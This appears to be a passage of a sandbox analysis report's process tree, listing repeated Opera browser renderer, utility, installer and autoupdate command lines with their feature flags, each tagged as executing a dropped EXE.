C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6564,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6316,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6784 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6372,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6928 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6112,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7064 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=7212,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7232 /prefetch:92⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\installer.exe" --fix-taskbar-pins2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\112.0.5197.24\installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x7ffc0bfd1a60,0x7ffc0bfd1a6c,0x7ffc0bfd1a783⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6808,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3668,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3904 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3372,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3456 /prefetch:142⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe" --enableipv6 --bypasslauncher --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Default" --pipeid=oauc_pipe2906202b27b41e4bd66c9238c4b575c12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exeC:\Users\Admin\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Default" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Default\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Default\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff7e4c1465c,0x7ff7e4c14668,0x7ff7e4c146783⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=7360,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7380 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6512,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7240 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6996,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6256 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=7384,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=4320 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=4296,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3904 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6692,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6824 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3432,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3764 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3672,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3276 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 